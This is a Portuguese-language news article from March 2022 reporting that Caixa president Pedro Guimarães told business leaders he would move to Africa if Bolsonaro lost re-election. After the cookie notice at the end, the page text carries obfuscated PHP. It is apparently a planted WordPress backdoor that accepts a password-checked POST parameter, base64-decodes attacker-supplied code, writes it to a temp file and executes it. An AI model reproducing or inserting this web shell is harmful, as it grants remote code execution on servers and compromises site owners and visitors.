• 31.03.2022
  • Redação

Em discurso alarmista, presidente da Caixa diz a empresários que mudará para a África se Bolsonaro perder

Em um jantar com empresários realizado na noite de quarta-feira, em São Paulo, o presidente da Caixa Econômica Federal, Pedro Guimarães, fez um discurso alarmista sobre o futuro do banco, caso Bolsonaro não seja reeleito. No encontro realizado pelo grupo Esfera Brasil, Guimarães afirmou que, se o presidente for derrotado, vai se mudar para África. 

— Afirmo com toda a tranquilidade a vocês. Daqui a um ou cinco anos vou pra Uganda, Ruanda, Tanzânia…Uma coisa que não tenho dúvida nenhuma: se não for o presidente Bolsonaro [no comando], game over. Por quê? A Caixa, durante anos, era o paraíso do Carnaval em Salvador [com patrocínio], montando aquela festa toda. Por isso, muitas coisas não andavam, isso eu vi — disse Guimarães a cerca de 30 empresários. A secretária especial do Ministério da Economia, Daniela Marques, também participou do jantar. 

O executivo afirmou que é “ingenuidade” acreditar que a Caixa não voltaria a ser o que era “com qualquer presidente que não seja Bolsonaro” e citou três vezes o caso do ex-deputado Geddel Vieira Lima, que foi um dos vice-presidentes do banco, entre 2011 e 2013. Ele foi preso em 2017, depois que a PF encontrou R$ 51 milhões em seu apartamento. A acusação apontava que o recurso vinha de um esquema criminoso ligado a desvios da Caixa operado por Geddel.

—  O cara que menos mandava na Caixa era o presidente. Quem mandava? O cara que botou o cara lá, o vice-presidente que ‘achou’ 51 milhões de reais em notas na casa da mãe dele — relatou. 

Na reunião, Guimarães disse que mudou 11 dos 12 vice-presidentes da Caixa quando assumiu o banco. Também prometeu que, em poucos anos, a instituição vai superar o Banco do Brasil e que dominará a frente do agronegócio. Afirmou, porém, que o projeto estaria em risco se Bolsonaro for derrotado e disse que os cargos voltarão a ser loteados entre partidos políticos.         

x

Utilizamos cookies e outras tecnologias para lhe oferecer uma experiência de navegação melhor, analisar o tráfego do site e personalizar o conteúdo, de acordo com a nossa Política de Privacidade. Ao continuar navegando, você concorda com estas condições.

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}